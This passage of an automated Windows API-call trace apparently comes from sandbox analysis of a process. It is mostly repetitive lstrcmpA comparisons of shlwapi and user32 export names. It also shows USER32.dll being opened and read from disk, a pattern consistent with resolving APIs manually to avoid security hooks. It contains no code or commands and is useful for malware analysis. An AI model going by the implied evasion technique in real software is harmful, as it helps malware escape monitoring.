lpString2="AssocQueryStringByKeyW") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0140.025] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0140.025] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0140.025] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0140.025] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0140.025] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0140.025] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0140.025] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0140.025] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0140.025] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0140.025] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0140.025] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0140.025] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0140.025] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0140.025] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0140.025] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0140.025] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0140.025] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0140.025] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0140.025] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0140.025] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0140.025] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0140.025] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0140.037] GetProcessHeap () returned 0x430000 [0140.037] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d65030 | out: hHeap=0x430000) returned 1 [0140.037] GetProcessHeap () returned 0x430000 [0140.037] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449060 [0140.037] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0140.037] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0140.037] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0140.037] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0140.037] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0140.038] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0140.038] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0140.038] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0140.038] GetProcessHeap () returned 0x430000 [0140.038] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x1555b8) returned 0x4121040 [0140.041] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0140.041] ReadFile (in: hFile=0x17c, lpBuffer=0x4121040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4121040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0140.311] CloseHandle (hObject=0x17c) returned 1 [0140.550] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0140.550] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0140.550] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0140.550] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0140.550] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0140.550] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0140.550] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0140.550] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0140.550] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0140.550] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0140.550] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0140.550] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0140.550] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0140.550] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0140.550] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0140.550] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0140.550] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0140.551] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0140.551] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0140.551] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0140.551] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0140.551] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0140.551] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0140.551] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0140.551] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0140.551] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0140.551] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0140.551] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0140.551] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0140.551] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0140.551] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0140.551] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0140.551] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0140.551] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0140.551] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0140.551] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0140.551] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0140.551] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0140.551] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0140.551] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0140.551] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0140.551] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0140.551] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0140.551] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0140.551] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0140.552] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0140.552] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0140.552] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0140.552] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0140.552] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0140.552] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0140.552] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0140.552] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0140.552] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0140.552] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0140.552] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0140.552] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0140.552] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0140.552] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0140.552] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0140.552] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0140.552] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0140.552] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0140.552] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0140.552] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0140.552] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0140.552] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0140.552] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0140.552] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0140.552] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0140.552] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0140.552] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0140.552] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0140.553] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0140.553] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0140.553] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0140.553] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0140.553] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0140.553] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0140.553] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0140.553] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0140.553] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0140.553] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0140.553] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0140.553] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0140.553] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0140.553] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0140.553] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0140.553] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0140.553] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0140.553] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0140.553] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0140.553] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0140.553] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0140.553] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0140.553] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0140.553] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0140.553] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0140.553] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0140.553] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0140.553] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0140.553] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0140.553] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0140.553] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0140.553] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0140.554] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0140.554] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0140.554] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0140.554] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0140.554] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0140.554] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0140.554] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0140.554] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0140.554] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0140.554] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0140.554] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0140.554] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0140.554] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0140.554] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0140.554] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0140.554] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0140.554] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0140.554] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0140.554] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0140.554] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0140.554] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0140.554] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0140.554] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0140.554] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0140.554] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0140.554] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0140.554] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0140.554] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0140.554] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0140.554] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0140.555] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0140.555] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0140.555] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0140.555] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0140.555] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0140.555] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0140.555] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0140.555] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0140.555] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0140.555] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0140.555] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0140.555] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0140.555] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0140.555] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0140.555] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0140.555] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0140.555] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0140.555] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0140.555] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0140.555] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0140.555] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0140.555] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0140.555] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0140.555] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0140.555] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0140.555] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0140.556] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0140.557] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0140.558] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0140.558] lstrcmpA 